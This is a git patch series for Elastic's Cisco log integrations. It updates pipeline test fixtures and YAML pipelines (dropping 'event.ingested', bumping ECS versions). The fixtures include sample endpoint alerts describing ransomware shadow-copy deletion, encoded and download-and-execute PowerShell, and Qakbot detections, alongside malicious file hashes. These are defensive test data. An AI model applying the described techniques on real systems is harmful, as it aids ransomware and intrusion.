"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6701398782847286000,\"timestamp\":1610621970,\"timestamp_nanoseconds\":182000000,\"date\":\"2021-01-14T10:59:30+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621970,\"start_date\":\"2021-01-14T10:59:30+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"file:///C%3A/Windows/SysWOW64/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\"}}}}}", "severity": 2, @@ -3573,7 +3530,6 @@ ], "code": "1107296274", "id": "7007136036637603000", - "ingested": "2022-02-02T05:53:29.530544324Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136036637603000,\"timestamp\":1610621707,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-14T10:55:07+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621707,\"start_date\":\"2021-01-14T10:55:07+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"file:///C%3A/Windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\"}}}}}", "severity": 2, @@ -3660,7 +3616,6 @@ ], "code": "1107296274", "id": "1476905066250000100", - "ingested": "2022-02-02T05:53:29.530545339Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066250000100,\"timestamp\":1610621237,\"timestamp_nanoseconds\":250000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", "severity": 3, @@ -3747,7 +3702,6 @@ ], "code": "1107296274", "id": "1476905066228000300", - "ingested": "2022-02-02T05:53:29.530546328Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066228000300,\"timestamp\":1610621237,\"timestamp_nanoseconds\":228000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", "severity": 2, @@ -3831,7 +3785,6 @@ ], "code": "2164260893", "id": "6411425813945647000", - "ingested": "2022-02-02T05:53:29.530547319Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "severity": 3 @@ -3903,7 +3856,6 @@ ], "code": "553648155", "id": "6411425813945647000", - "ingested": "2022-02-02T05:53:29.530548322Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "severity": 3 @@ -3977,7 +3929,6 @@ ], "code": "553648147", "id": "6411425813945647000", - "ingested": "2022-02-02T05:53:29.530549314Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "severity": 3 diff --git a/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml index cb8d2c4f94c..a656dcfb7b3 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml @@ -35,9 +35,6 @@ processors: ####################### ## ECS Event Mapping ## ####################### -- set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json index f98cd40bf11..e69ee4c688f 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json @@ -30,7 +30,6 @@ }, "event": { "category": "network", - "ingested": "2022-02-03T13:00:19.421779927Z", "original": "2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,OUTBOUND,1,84,172.17.3.4,,67.43.156.12,,ams1.edc,12,ALLOW", "type": [ "allowed" @@ -102,7 +101,6 @@ }, "event": { "category": "network", - "ingested": "2022-02-03T13:00:19.421785901Z", "original": "2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,INBOUND,1,84,172.17.3.4,,67.43.156.12,,ams1.edc,12,BLOCK", "type": [ "denied" diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json index f723b31a025..26d6ccb2b8e 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json @@ -47,7 +47,6 @@ "event": { "action": "dns-request-Allowed", "category": "network", - "ingested": "2022-02-03T13:00:20.465652573Z", "original": "\"2020-07-23 23:49:54\",\"elasticuser\",\"elasticuser2,some other identity\",\"192.168.1.1\",\"81.2.69.144\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Software/Technology,Business Services,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"\"", "type": [ "allowed", @@ -135,7 +134,6 @@ "event": { "action": "dns-request-Blocked", "category": "network", - "ingested": "2022-02-03T13:00:20.465653868Z", "original": "\"2020-07-23 23:50:25\",\"elasticuser\",\"elasticuser2,some other identity\",\"192.168.1.1\",\"67.43.156.12\",\"Blocked\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Chat,Instant Messaging,Block List,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"BlockedCategories\"", "type": [ "denied", @@ -217,7 +215,6 @@ "event": { "action": "dns-request-Allowed", "category": "network", - "ingested": "2022-02-03T13:00:20.465654255Z", "original": "\"2021-05-14 19:39:58\",\"elastic_machine\",\"elastic_machine,Elastic User (ElasticUser@elastic.co)\",\"67.43.156.12\",\"81.2.69.144\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Infrastructure\",\"Roaming Computers\",\"Roaming Computers,AD Users\",\"\"", "type": [ "allowed", diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json index 86fccef0590..b752261888b 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json @@ -29,7 +29,6 @@ }, "event": { "category": "network", - "ingested": "2022-02-03T13:00:21.572805576Z", "original": "\"2020-08-26 20:32:46\",\"elasticuser\",\"192.168.1.1\",\"0\",\"81.2.69.144\",\"0\",\"Test Category\"" }, "log": { @@ -89,7 +88,6 @@ }, "event": { "category": "network", - "ingested": "2022-02-03T13:00:21.572807422Z", "original": "\"2020-08-26 20:32:45\",\"elasticuser\",\"192.168.1.1\",\"61095\",\"81.2.69.144\",\"445\",\"Test Category\"" }, "log": { diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json index 83a2b73937e..07ee992beb5 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json @@ -34,7 +34,6 @@ }, "event": { "category": "network", - "ingested": "2022-02-03T13:00:21.965624301Z", "original": "\"2020-07-23 23:48:56\",\"elasticuser\",\"someotheruser\",\"192.168.1.1\",\"67.43.156.12\",\"81.2.69.144\",\"\",\"ALLOWED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"", "type": [ "allowed" @@ -120,7 +119,6 @@ }, "event": { "category": "network", - "ingested": "2022-02-03T13:00:21.965626189Z", "original": "\"2020-07-23 23:48:56\",\"elasticuser\",\"someotheruser\",\"192.168.1.1\",\"67.43.156.12\",\"81.2.69.144\",\"\",\"BLOCKED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"", "type": [ "denied" @@ -186,7 +184,6 @@ }, "event": { "category": "network", - "ingested": "2022-02-03T13:00:21.965626568Z", "original": "\"2017-10-02 23:52:53\",\"elasticuser\",\"ActiveDirectoryUserName,ADSite,Network\",\"192.168.192.135\",\"67.43.156.12\",\"\",\"\",\"ALLOWED\",\"http://google.com/the.js\",\"www.google.com\",\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\",\"200\",\"562\",\"1489\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"Networks\"", "type": [ "allowed" diff --git a/packages/cisco_umbrella/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_umbrella/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 3a637029907..5da5c91cf71 100644 --- a/packages/cisco_umbrella/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_umbrella/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -2,10 +2,6 @@ description: Pipeline for Cisco Umbrella processors: - # ECS event.ingested - - set: - field: event.ingested - value: "{{_ingest.timestamp}}" - set: field: ecs.version value: "8.2.0" From 6f4bb5dcac3b3079de1f8b07df8d49885db881d4 Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Wed, 16 Mar 2022 11:39:03 -0500 Subject: [PATCH 20/23] Make akamai version change be minor, fix quotes --- .../item_usages/elasticsearch/ingest_pipeline/default.yml | 2 +- .../signin_attempts/elasticsearch/ingest_pipeline/default.yml | 2 +- packages/akamai/changelog.yml | 2 +- packages/akamai/manifest.yml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/packages/1password/data_stream/item_usages/elasticsearch/ingest_pipeline/default.yml b/packages/1password/data_stream/item_usages/elasticsearch/ingest_pipeline/default.yml index 4475e544a00..1b6e7d384ae 100644 --- a/packages/1password/data_stream/item_usages/elasticsearch/ingest_pipeline/default.yml +++ b/packages/1password/data_stream/item_usages/elasticsearch/ingest_pipeline/default.yml @@ -16,7 +16,7 @@ processors: ####################### - set: field: ecs.version - value: '8.2.0' + value: "8.2.0" # Sets event.created from the @timestamp field generated by filebeat before being overwritten further down - set: field: event.created diff --git a/packages/1password/data_stream/signin_attempts/elasticsearch/ingest_pipeline/default.yml b/packages/1password/data_stream/signin_attempts/elasticsearch/ingest_pipeline/default.yml index c9c201aeeef..8f8c07dbf4d 100644 --- a/packages/1password/data_stream/signin_attempts/elasticsearch/ingest_pipeline/default.yml +++ b/packages/1password/data_stream/signin_attempts/elasticsearch/ingest_pipeline/default.yml @@ -16,7 +16,7 @@ processors: ####################### - set: field: ecs.version - value: '8.2.0' + value: "8.2.0" # Sets event.created from the @timestamp field generated by filebeat before being overwritten further down - set: field: event.created diff --git a/packages/akamai/changelog.yml b/packages/akamai/changelog.yml index 10c81457de1..012050a25b1 100644 --- a/packages/akamai/changelog.yml +++ b/packages/akamai/changelog.yml @@ -1,5 +1,5 @@ # newer versions go on top -- version: "0.1.2" +- version: "0.2.0" changes: - description: Update to ECS 8.2 type: enhancement diff --git a/packages/akamai/manifest.yml b/packages/akamai/manifest.yml index f22f5542838..a27c881a629 100644 --- a/packages/akamai/manifest.yml +++ b/packages/akamai/manifest.yml @@ -1,6 +1,6 @@ name: akamai title: Akamai -version: 0.1.2 +version: 0.2.0 release: beta description: Akamai Integration type: integration From 177071c865c0fa0a84da25a45cc7ae852bf7824e Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 5 Apr 2022 08:53:00 -0500 Subject: [PATCH 21/23] Clean up manifest after merge --- packages/cisco_umbrella/manifest.yml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/packages/cisco_umbrella/manifest.yml b/packages/cisco_umbrella/manifest.yml index 5cc8dbe7b5f..7e7881e02f7 100644 --- a/packages/cisco_umbrella/manifest.yml +++ b/packages/cisco_umbrella/manifest.yml @@ -1,11 +1,7 @@ format_version: 1.0.0 name: cisco_umbrella title: Cisco Umbrella -<<<<<<< HEAD version: 0.6.0 -======= -version: 0.5.1 ->>>>>>> main license: basic description: Collect logs from Cisco Umbrella with Elastic Agent. type: integration From 45da561260c7a21588b14236fa791c6d408b4c5f Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 5 Apr 2022 08:59:45 -0500 Subject: [PATCH 22/23] Fix cisco_ftd changelog --- packages/cisco_ftd/changelog.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/packages/cisco_ftd/changelog.yml b/packages/cisco_ftd/changelog.yml index 398f339557e..576d44f9699 100644 --- a/packages/cisco_ftd/changelog.yml +++ b/packages/cisco_ftd/changelog.yml @@ -1,7 +1,7 @@ # newer versions go on top - version: "2.1.0" changes: - - description: Update to ECS 8.1 + - description: Update to ECS 8.2 type: enhancement link: https://github.com/elastic/integrations/pull/2778 - version: "2.0.1" From ab8b9ef7dff5da0f5a5594e606dc1bbcbd25ee9f Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Tue, 5 Apr 2022 09:33:18 -0500 Subject: [PATCH 23/23] Regen files after merge --- ...test-additional-messages.log-expected.json | 16 +++++----- .../pipeline/test-sample.log-expected.json | 30 +++++++++---------- 2 files changed, 23 insertions(+), 23 deletions(-) diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json index 3f6226a1f6b..72b5f3a3e6c 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json @@ -5755,7 +5755,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5830,7 +5830,7 @@ "ip": "172.31.98.44" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5925,7 +5925,7 @@ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6024,7 +6024,7 @@ "port": 500 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -6117,7 +6117,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6169,7 +6169,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6221,7 +6221,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6273,7 +6273,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json index fa456dd1652..e7bbfd75d20 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json @@ -5092,7 +5092,7 @@ "ip": "172.17.6.211" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5177,7 +5177,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5287,7 +5287,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5399,7 +5399,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -5494,7 +5494,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -5593,7 +5593,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -5686,7 +5686,7 @@ "port": 18449 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -5763,7 +5763,7 @@ "ip": "ff02::1" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -5835,7 +5835,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5924,7 +5924,7 @@ "port": 50120 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -6027,7 +6027,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -6129,7 +6129,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6226,7 +6226,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -6333,7 +6333,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6437,7 +6437,7 @@ "ip": "81.2.69.193" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deleted",